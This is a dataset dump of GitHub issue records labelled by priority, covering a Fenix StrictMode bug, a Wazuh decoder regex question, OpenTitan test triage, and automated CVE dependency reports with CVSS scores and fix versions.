Unnamed: 0
int64
0
832k
id
float64
2.49B
32.1B
type
stringclasses
1 value
created_at
stringlengths
19
19
repo
stringlengths
5
112
repo_url
stringlengths
34
141
action
stringclasses
3 values
title
stringlengths
1
844
labels
stringlengths
4
721
body
stringlengths
1
261k
index
stringclasses
12 values
text_combine
stringlengths
96
261k
label
stringclasses
2 values
text
stringlengths
96
248k
binary_label
int64
0
1
27,903
13,450,841,839
IssuesEvent
2020-09-08 19:12:53
mozilla-mobile/fenix
https://api.github.com/repos/mozilla-mobile/fenix
closed
FNX-14548 ⁃ [Bug] Strictmode violation on cold startup for SharedPrefs in LeanplumMetricsService.init
eng:performance hershey 🐞 bug
There is a strict mode violation (on disk read) caused by sharedpref on startup inside `LeanplumMetricsService` Tested on pixel 2 and samsung *** Here are the logs from the violation ``` 2020-08-06 13:40:54.156 10765-10765/org.mozilla.fenix.debug D/StrictMode: StrictMode policy violation; ~duration=20 ms: android.os.StrictMode$StrictModeDiskReadViolation: policy=196671 violation=2 at android.os.StrictMode$AndroidBlockGuardPolicy.onReadFromDisk(StrictMode.java:1438) at java.io.UnixFileSystem.checkAccess(UnixFileSystem.java:251) at java.io.File.exists(File.java:807) at android.app.ContextImpl.ensurePrivateDirExists(ContextImpl.java:565) at android.app.ContextImpl.ensurePrivateDirExists(ContextImpl.java:556) at android.app.ContextImpl.getPreferencesDir(ContextImpl.java:512) at android.app.ContextImpl.getSharedPreferencesPath(ContextImpl.java:704) at android.app.ContextImpl.getSharedPreferences(ContextImpl.java:372) at android.content.ContextWrapper.getSharedPreferences(ContextWrapper.java:178) at org.mozilla.fenix.components.metrics.LeanplumMetricsService.<init>(LeanplumMetricsService.kt:82) at org.mozilla.fenix.components.metrics.LeanplumMetricsService.<init>(LeanplumMetricsService.kt:57) at org.mozilla.fenix.components.Analytics$metrics$2.invoke(Analytics.kt:91) at org.mozilla.fenix.components.Analytics$metrics$2.invoke(Analytics.kt:36) at kotlin.SynchronizedLazyImpl.getValue(LazyJVM.kt:74) at org.mozilla.fenix.components.Analytics.getMetrics(Unknown Source:2) at org.mozilla.fenix.FenixApplication.startMetricsIfEnabled(FenixApplication.kt:231) at org.mozilla.fenix.FenixApplication.setupInMainProcessOnly(FenixApplication.kt:146) at org.mozilla.fenix.FenixApplication.onCreate(FenixApplication.kt:93) at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1125) at android.app.ActivityThread.handleBindApplication(ActivityThread.java:6062) at android.app.ActivityThread.-wrap1(Unknown Source:0) at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1764) at android.os.Handler.dispatchMessage(Handler.java:105) at android.os.Looper.loop(Looper.java:164) at android.app.ActivityThread.main(ActivityThread.java:6944) at java.lang.reflect.Method.invoke(Native Method) at com.android.internal.os.Zygote$MethodAndArgsCaller.run(Zygote.java:327) at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1374) ```
True
FNX-14548 ⁃ [Bug] Strictmode violation on cold startup for SharedPrefs in LeanplumMetricsService.init - There is a strict mode violation (on disk read) caused by sharedpref on startup inside `LeanplumMetricsService` Tested on pixel 2 and samsung *** Here are the logs from the violation ``` 2020-08-06 13:40:54.156 10765-10765/org.mozilla.fenix.debug D/StrictMode: StrictMode policy violation; ~duration=20 ms: android.os.StrictMode$StrictModeDiskReadViolation: policy=196671 violation=2 at android.os.StrictMode$AndroidBlockGuardPolicy.onReadFromDisk(StrictMode.java:1438) at java.io.UnixFileSystem.checkAccess(UnixFileSystem.java:251) at java.io.File.exists(File.java:807) at android.app.ContextImpl.ensurePrivateDirExists(ContextImpl.java:565) at android.app.ContextImpl.ensurePrivateDirExists(ContextImpl.java:556) at android.app.ContextImpl.getPreferencesDir(ContextImpl.java:512) at android.app.ContextImpl.getSharedPreferencesPath(ContextImpl.java:704) at android.app.ContextImpl.getSharedPreferences(ContextImpl.java:372) at android.content.ContextWrapper.getSharedPreferences(ContextWrapper.java:178) at org.mozilla.fenix.components.metrics.LeanplumMetricsService.<init>(LeanplumMetricsService.kt:82) at org.mozilla.fenix.components.metrics.LeanplumMetricsService.<init>(LeanplumMetricsService.kt:57) at org.mozilla.fenix.components.Analytics$metrics$2.invoke(Analytics.kt:91) at org.mozilla.fenix.components.Analytics$metrics$2.invoke(Analytics.kt:36) at kotlin.SynchronizedLazyImpl.getValue(LazyJVM.kt:74) at org.mozilla.fenix.components.Analytics.getMetrics(Unknown Source:2) at org.mozilla.fenix.FenixApplication.startMetricsIfEnabled(FenixApplication.kt:231) at org.mozilla.fenix.FenixApplication.setupInMainProcessOnly(FenixApplication.kt:146) at org.mozilla.fenix.FenixApplication.onCreate(FenixApplication.kt:93) at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1125) at android.app.ActivityThread.handleBindApplication(ActivityThread.java:6062) at android.app.ActivityThread.-wrap1(Unknown Source:0) at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1764) at android.os.Handler.dispatchMessage(Handler.java:105) at android.os.Looper.loop(Looper.java:164) at android.app.ActivityThread.main(ActivityThread.java:6944) at java.lang.reflect.Method.invoke(Native Method) at com.android.internal.os.Zygote$MethodAndArgsCaller.run(Zygote.java:327) at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1374) ```
non_priority
fnx ⁃ strictmode violation on cold startup for sharedprefs in leanplummetricsservice init there is a strict mode violation on disk read caused by sharedpref on startup inside leanplummetricsservice tested on pixel and samsung here are the logs from the violation org mozilla fenix debug d strictmode strictmode policy violation duration ms android os strictmode strictmodediskreadviolation policy violation at android os strictmode androidblockguardpolicy onreadfromdisk strictmode java at java io unixfilesystem checkaccess unixfilesystem java at java io file exists file java at android app contextimpl ensureprivatedirexists contextimpl java at android app contextimpl ensureprivatedirexists contextimpl java at android app contextimpl getpreferencesdir contextimpl java at android app contextimpl getsharedpreferencespath contextimpl java at android app contextimpl getsharedpreferences contextimpl java at android content contextwrapper getsharedpreferences contextwrapper java at org mozilla fenix components metrics leanplummetricsservice leanplummetricsservice kt at org mozilla fenix components metrics leanplummetricsservice leanplummetricsservice kt at org mozilla fenix components analytics metrics invoke analytics kt at org mozilla fenix components analytics metrics invoke analytics kt at kotlin synchronizedlazyimpl getvalue lazyjvm kt at org mozilla fenix components analytics getmetrics unknown source at org mozilla fenix fenixapplication startmetricsifenabled fenixapplication kt at org mozilla fenix fenixapplication setupinmainprocessonly fenixapplication kt at org mozilla fenix fenixapplication oncreate fenixapplication kt at android app instrumentation callapplicationoncreate instrumentation java at android app activitythread handlebindapplication activitythread java at android app activitythread unknown source at android app activitythread h handlemessage activitythread java at android os handler dispatchmessage handler java at android os looper loop looper java at android app activitythread main activitythread java at java lang reflect method invoke native method at com android internal os zygote methodandargscaller run zygote java at com android internal os zygoteinit main zygoteinit java
0
132,197
18,266,188,435
IssuesEvent
2021-10-04 08:44:06
artsking/linux-3.0.35_CVE-2020-15436_withPatch
https://api.github.com/repos/artsking/linux-3.0.35_CVE-2020-15436_withPatch
closed
CVE-2017-11472 (High) detected in linux-stable-rtv3.8.6 - autoclosed
security vulnerability
## CVE-2017-11472 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linux-stable-rtv3.8.6</b></p></summary> <p> <p>Julia Cartwright's fork of linux-stable-rt.git</p> <p>Library home page: <a href=https://git.kernel.org/pub/scm/linux/kernel/git/julia/linux-stable-rt.git>https://git.kernel.org/pub/scm/linux/kernel/git/julia/linux-stable-rt.git</a></p> <p>Found in HEAD commit: <a href="https://github.com/artsking/linux-3.0.35_CVE-2020-15436_withPatch/commit/87eecd735a2e4c02ba0c4dc61594d4311e35d5d9">87eecd735a2e4c02ba0c4dc61594d4311e35d5d9</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (3)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/drivers/acpi/acpica/nsutils.c</b> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/drivers/acpi/acpica/nsutils.c</b> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/drivers/acpi/acpica/nsutils.c</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The acpi_ns_terminate() function in drivers/acpi/acpica/nsutils.c in the Linux kernel before 4.12 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table. <p>Publish Date: 2017-07-20 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2017-11472>CVE-2017-11472</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/torvalds/linux/commit/3b2d69114fefa474fca542e51119036dceb4aa6f">https://github.com/torvalds/linux/commit/3b2d69114fefa474fca542e51119036dceb4aa6f</a></p> <p>Release Date: 2017-07-20</p> <p>Fix Resolution: v4.12-rc1</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2017-11472 (High) detected in linux-stable-rtv3.8.6 - autoclosed - ## CVE-2017-11472 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linux-stable-rtv3.8.6</b></p></summary> <p> <p>Julia Cartwright's fork of linux-stable-rt.git</p> <p>Library home page: <a href=https://git.kernel.org/pub/scm/linux/kernel/git/julia/linux-stable-rt.git>https://git.kernel.org/pub/scm/linux/kernel/git/julia/linux-stable-rt.git</a></p> <p>Found in HEAD commit: <a href="https://github.com/artsking/linux-3.0.35_CVE-2020-15436_withPatch/commit/87eecd735a2e4c02ba0c4dc61594d4311e35d5d9">87eecd735a2e4c02ba0c4dc61594d4311e35d5d9</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (3)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/drivers/acpi/acpica/nsutils.c</b> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/drivers/acpi/acpica/nsutils.c</b> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/drivers/acpi/acpica/nsutils.c</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The acpi_ns_terminate() function in drivers/acpi/acpica/nsutils.c in the Linux kernel before 4.12 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table. <p>Publish Date: 2017-07-20 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2017-11472>CVE-2017-11472</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/torvalds/linux/commit/3b2d69114fefa474fca542e51119036dceb4aa6f">https://github.com/torvalds/linux/commit/3b2d69114fefa474fca542e51119036dceb4aa6f</a></p> <p>Release Date: 2017-07-20</p> <p>Fix Resolution: v4.12-rc1</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve high detected in linux stable autoclosed cve high severity vulnerability vulnerable library linux stable julia cartwright s fork of linux stable rt git library home page a href found in head commit a href found in base branch master vulnerable source files drivers acpi acpica nsutils c drivers acpi acpica nsutils c drivers acpi acpica nsutils c vulnerability details the acpi ns terminate function in drivers acpi acpica nsutils c in the linux kernel before does not flush the operand cache and causes a kernel stack dump which allows local users to obtain sensitive information from kernel memory and bypass the kaslr protection mechanism in the kernel through via a crafted acpi table publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required low user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution step up your open source security game with whitesource
0
117,700
25,181,456,276
IssuesEvent
2022-11-11 14:03:17
wazuh/wazuh
https://api.github.com/repos/wazuh/wazuh
closed
Regex contradicts with Nano syntax for OpenVPN-Wazuh Custom Decoder
type/bug reporter/community feed/decoders
Hi, I am trying to write custom decoder for OpenVPN in Wazuh, as the logs are directly written to the file and not via syslog. The regex is working fine as I am writing/testing it in https://regexlearn.com/playground and https://regex101.com/ before making changes to the local_decoder.xml file. ()For instance, for the log: ![image](https://user-images.githubusercontent.com/59825087/200166536-c1b603eb-bb06-4638-b6df-dcf5ed078185.png) ![image](https://user-images.githubusercontent.com/59825087/200166499-b77c8a4d-e832-428d-92b0-d00e5773a45f.png) Oct 14 00:45:55 2022 us=175209 132.32.167.9:60048 TLS Error: cannot locate HMAC in incoming packet from [AF_INET]132.32.167.9:60048 OR Oct 14 00:45:55 2022 us=175209 132.32.167.9:60048 TLS Error: cannot locate HMAC in incoming packet from [AF_INET6]::ffff:132.32.167.9:60048 I have written a decoder of: `<decoder name="openvpn-HMAC"> <prematch>AF_INET6?</prematch> <regex>(::(\S+)?:)?(\d+\.\d+\.\d+\.\d+):(\d+)</regex> <order>srcip,srcport</order> </decoder>` OR `<decoder name="openvpn-HMAC"> <prematch>AF_INET6?</prematch> <regex>(?<=])((\S+)?:(\S+)?:(\S+):)?(\d+\.\d+\.\d+\.\d+):(\d+)</regex> <order>srcip,srcport</order> </decoder>` Both regex works fine in above share links for extracting the right values but for the first one Wazuh-manager fails to restart with an error of **ERROR: (1452): Syntax error on regex: '(::(\S+)?:)?(\d+\.\d+\.\d+\.\d+):(\d+)'** While for the second the '<' changes the code/contradicts with Nano, I assume. ![image](https://user-images.githubusercontent.com/59825087/200166018-2d7673a0-0bb2-4ff4-bfdc-94700263b454.png) **Update:** I know the regex is quite simple and it can be optimized (which I did for my first simple decoder regex from `(\d+\.\d+\.\d+\.\d+):(\d+) to (\d+\.?)+:(\d+)`). But the update is the decoder I first wrote initially and was working fine, is not extracting the correct fields now, even when i return to (\d+\.\d+\.\d+\.\d+):(\d+). I really don't understand why its happening. Will really appreciate some help!
1.0
Regex contradicts with Nano syntax for OpenVPN-Wazuh Custom Decoder - Hi, I am trying to write custom decoder for OpenVPN in Wazuh, as the logs are directly written to the file and not via syslog. The regex is working fine as I am writing/testing it in https://regexlearn.com/playground and https://regex101.com/ before making changes to the local_decoder.xml file. ()For instance, for the log: ![image](https://user-images.githubusercontent.com/59825087/200166536-c1b603eb-bb06-4638-b6df-dcf5ed078185.png) ![image](https://user-images.githubusercontent.com/59825087/200166499-b77c8a4d-e832-428d-92b0-d00e5773a45f.png) Oct 14 00:45:55 2022 us=175209 132.32.167.9:60048 TLS Error: cannot locate HMAC in incoming packet from [AF_INET]132.32.167.9:60048 OR Oct 14 00:45:55 2022 us=175209 132.32.167.9:60048 TLS Error: cannot locate HMAC in incoming packet from [AF_INET6]::ffff:132.32.167.9:60048 I have written a decoder of: `<decoder name="openvpn-HMAC"> <prematch>AF_INET6?</prematch> <regex>(::(\S+)?:)?(\d+\.\d+\.\d+\.\d+):(\d+)</regex> <order>srcip,srcport</order> </decoder>` OR `<decoder name="openvpn-HMAC"> <prematch>AF_INET6?</prematch> <regex>(?<=])((\S+)?:(\S+)?:(\S+):)?(\d+\.\d+\.\d+\.\d+):(\d+)</regex> <order>srcip,srcport</order> </decoder>` Both regex works fine in above share links for extracting the right values but for the first one Wazuh-manager fails to restart with an error of **ERROR: (1452): Syntax error on regex: '(::(\S+)?:)?(\d+\.\d+\.\d+\.\d+):(\d+)'** While for the second the '<' changes the code/contradicts with Nano, I assume. ![image](https://user-images.githubusercontent.com/59825087/200166018-2d7673a0-0bb2-4ff4-bfdc-94700263b454.png) **Update:** I know the regex is quite simple and it can be optimized (which I did for my first simple decoder regex from `(\d+\.\d+\.\d+\.\d+):(\d+) to (\d+\.?)+:(\d+)`). But the update is the decoder I first wrote initially and was working fine, is not extracting the correct fields now, even when i return to (\d+\.\d+\.\d+\.\d+):(\d+). I really don't understand why its happening. Will really appreciate some help!
non_priority
regex contradicts with nano syntax for openvpn wazuh custom decoder hi i am trying to write custom decoder for openvpn in wazuh as the logs are directly written to the file and not via syslog the regex is working fine as i am writing testing it in and before making changes to the local decoder xml file for instance for the log oct us tls error cannot locate hmac in incoming packet from or oct us tls error cannot locate hmac in incoming packet from ffff i have written a decoder of af s d d d d d srcip srcport or af srcip srcport both regex works fine in above share links for extracting the right values but for the first one wazuh manager fails to restart with an error of error syntax error on regex s d d d d d while for the second the changes the code contradicts with nano i assume update i know the regex is quite simple and it can be optimized which i did for my first simple decoder regex from d d d d d to d d but the update is the decoder i first wrote initially and was working fine is not extracting the correct fields now even when i return to d d d d d i really don t understand why its happening will really appreciate some help
0
61,382
12,180,782,818
IssuesEvent
2020-04-28 13:02:35
GSA/code-gov-front-end
https://api.github.com/repos/GSA/code-gov-front-end
opened
Remove json-schema-validator-web-component
[area] code quality [effort] medium
Remove web component until new schema developed and can use https://www.npmjs.com/package/jsoneditor with it integrated. 1. Remove web component from site. 2. Remove text/link - Federal Agencies -> How to Inventory 3. Deprecate repo, NPM, and update Snyk testing.
1.0
Remove json-schema-validator-web-component - Remove web component until new schema developed and can use https://www.npmjs.com/package/jsoneditor with it integrated. 1. Remove web component from site. 2. Remove text/link - Federal Agencies -> How to Inventory 3. Deprecate repo, NPM, and update Snyk testing.
non_priority
remove json schema validator web component remove web component until new schema developed and can use with it integrated remove web component from site remove text link federal agencies how to inventory deprecate repo npm and update snyk testing
0
101,987
31,779,758,654
IssuesEvent
2023-09-12 16:34:10
PDP-10/its
https://api.github.com/repos/PDP-10/its
closed
Add Chaosnet bridge
build process chaosnet
Add @bictorv's Chaosnet bridge as a submodule. (Dream scenario: it builds and auto configures and connects to The Chaosnet automagically.)
1.0
Add Chaosnet bridge - Add @bictorv's Chaosnet bridge as a submodule. (Dream scenario: it builds and auto configures and connects to The Chaosnet automagically.)
non_priority
add chaosnet bridge add bictorv s chaosnet bridge as a submodule dream scenario it builds and auto configures and connects to the chaosnet automagically
0
272,370
23,668,795,326
IssuesEvent
2022-08-27 02:58:12
lowRISC/opentitan
https://api.github.com/repos/lowRISC/opentitan
closed
[test-triage] chip_sw_lc_ctrl_transition
Component:TestTriage
### Hierarchy of regression failure Chip Level ### Failure Description UVM_ERROR @ * us: (prim_reg_cdc_arb.sv:239) [ASSERT FAILED] ReqTimeout_A has 1 failures: Test chip_sw_lc_ctrl_transition has 1 failures. 6.chip_sw_lc_ctrl_transition.925179959 Line 475, in log /container/opentitan-public/scratch/os_regression/chip_earlgrey_asic-sim-vcs/6.chip_sw_lc_ctrl_transition/latest/run.log UVM_ERROR @ 6177.665891 us: (prim_reg_cdc_arb.sv:239) [ASSERT FAILED] ReqTimeout_A UVM_INFO @ 6177.665891 us: (uvm_report_catcher.svh:705) [UVM/REPORT/CATCHER] --- UVM Report catcher Summary --- ### Steps to Reproduce - Commit hash where failure was observed [e7fcdad95](https://github.com/lowrisc/opentitan/tree/e7fcdad95951dc92314348fd4661757f17bd04cd) - dvsim invocation command to reproduce the failure, inclusive of build and run seeds ./util/dvsim/dvsim.py hw/top_earlgrey/dv/chip_sim_cfg.hjson -i chip_sw_lc_ctrl_transition --fixed-seed 925179959 --build-seed 2134690559 --waves -v h - Kokoro build number if applicable ### Tests with similar or related failures - [ ] chip_sw_pwrmgr_smoketest (https://github.com/lowRISC/opentitan/issues/14581)
1.0
[test-triage] chip_sw_lc_ctrl_transition - ### Hierarchy of regression failure Chip Level ### Failure Description UVM_ERROR @ * us: (prim_reg_cdc_arb.sv:239) [ASSERT FAILED] ReqTimeout_A has 1 failures: Test chip_sw_lc_ctrl_transition has 1 failures. 6.chip_sw_lc_ctrl_transition.925179959 Line 475, in log /container/opentitan-public/scratch/os_regression/chip_earlgrey_asic-sim-vcs/6.chip_sw_lc_ctrl_transition/latest/run.log UVM_ERROR @ 6177.665891 us: (prim_reg_cdc_arb.sv:239) [ASSERT FAILED] ReqTimeout_A UVM_INFO @ 6177.665891 us: (uvm_report_catcher.svh:705) [UVM/REPORT/CATCHER] --- UVM Report catcher Summary --- ### Steps to Reproduce - Commit hash where failure was observed [e7fcdad95](https://github.com/lowrisc/opentitan/tree/e7fcdad95951dc92314348fd4661757f17bd04cd) - dvsim invocation command to reproduce the failure, inclusive of build and run seeds ./util/dvsim/dvsim.py hw/top_earlgrey/dv/chip_sim_cfg.hjson -i chip_sw_lc_ctrl_transition --fixed-seed 925179959 --build-seed 2134690559 --waves -v h - Kokoro build number if applicable ### Tests with similar or related failures - [ ] chip_sw_pwrmgr_smoketest (https://github.com/lowRISC/opentitan/issues/14581)
non_priority
chip sw lc ctrl transition hierarchy of regression failure chip level failure description uvm error us prim reg cdc arb sv reqtimeout a has failures test chip sw lc ctrl transition has failures chip sw lc ctrl transition line in log container opentitan public scratch os regression chip earlgrey asic sim vcs chip sw lc ctrl transition latest run log uvm error us prim reg cdc arb sv reqtimeout a uvm info us uvm report catcher svh uvm report catcher summary steps to reproduce commit hash where failure was observed dvsim invocation command to reproduce the failure inclusive of build and run seeds util dvsim dvsim py hw top earlgrey dv chip sim cfg hjson i chip sw lc ctrl transition fixed seed build seed waves v h kokoro build number if applicable tests with similar or related failures chip sw pwrmgr smoketest
0
220,134
24,562,385,774
IssuesEvent
2022-10-12 21:40:43
KDWSS/angular-components
https://api.github.com/repos/KDWSS/angular-components
opened
CVE-2022-37599 (Medium) detected in loader-utils-2.0.0.tgz, loader-utils-1.4.0.tgz
security vulnerability
## CVE-2022-37599 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>loader-utils-2.0.0.tgz</b>, <b>loader-utils-1.4.0.tgz</b></p></summary> <p> <details><summary><b>loader-utils-2.0.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz</a></p> <p> Dependency Hierarchy: - build-angular-12.2.5.tgz (Root Library) - :x: **loader-utils-2.0.0.tgz** (Vulnerable Library) </details> <details><summary><b>loader-utils-1.4.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz</a></p> <p> Dependency Hierarchy: - build-angular-12.2.5.tgz (Root Library) - babel-loader-8.2.2.tgz - :x: **loader-utils-1.4.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/KDWSS/angular-components/commit/36a9c5d28529109984de6fcc3d0a157d561dac4a">36a9c5d28529109984de6fcc3d0a157d561dac4a</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js. <p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37599>CVE-2022-37599</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p>
True
CVE-2022-37599 (Medium) detected in loader-utils-2.0.0.tgz, loader-utils-1.4.0.tgz - ## CVE-2022-37599 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>loader-utils-2.0.0.tgz</b>, <b>loader-utils-1.4.0.tgz</b></p></summary> <p> <details><summary><b>loader-utils-2.0.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz</a></p> <p> Dependency Hierarchy: - build-angular-12.2.5.tgz (Root Library) - :x: **loader-utils-2.0.0.tgz** (Vulnerable Library) </details> <details><summary><b>loader-utils-1.4.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz</a></p> <p> Dependency Hierarchy: - build-angular-12.2.5.tgz (Root Library) - babel-loader-8.2.2.tgz - :x: **loader-utils-1.4.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/KDWSS/angular-components/commit/36a9c5d28529109984de6fcc3d0a157d561dac4a">36a9c5d28529109984de6fcc3d0a157d561dac4a</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js. <p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37599>CVE-2022-37599</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p>
non_priority
cve medium detected in loader utils tgz loader utils tgz cve medium severity vulnerability vulnerable libraries loader utils tgz loader utils tgz loader utils tgz utils for webpack loaders library home page a href dependency hierarchy build angular tgz root library x loader utils tgz vulnerable library loader utils tgz utils for webpack loaders library home page a href dependency hierarchy build angular tgz root library babel loader tgz x loader utils tgz vulnerable library found in head commit a href found in base branch master vulnerability details a regular expression denial of service redos flaw was found in function interpolatename in interpolatename js in webpack loader utils via the resourcepath variable in interpolatename js publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href
0
25,641
12,266,420,166
IssuesEvent
2020-05-07 08:55:50
wellcomecollection/platform
https://api.github.com/repos/wellcomecollection/platform
closed
How do we send big MXF files to Glacier?
💬 Discussion 📦 Storage service
The new A/V workflows are going to ingest some extremely large MXF video files (tens or hundreds of gigabytes each). They also include MP4 videos, which are much smaller and what we'll be serving most of the time. We want to keep multiple copies of the files, but we don't want to keep the warm replica as Standard&#8209;IA – that would be expensive, and access to the MXF masters will be rare. We'd like to keep these objects in Glacier instead. **Q1: Is this an accurate summary of the problem?**
1.0
How do we send big MXF files to Glacier? - The new A/V workflows are going to ingest some extremely large MXF video files (tens or hundreds of gigabytes each). They also include MP4 videos, which are much smaller and what we'll be serving most of the time. We want to keep multiple copies of the files, but we don't want to keep the warm replica as Standard&#8209;IA – that would be expensive, and access to the MXF masters will be rare. We'd like to keep these objects in Glacier instead. **Q1: Is this an accurate summary of the problem?**
non_priority
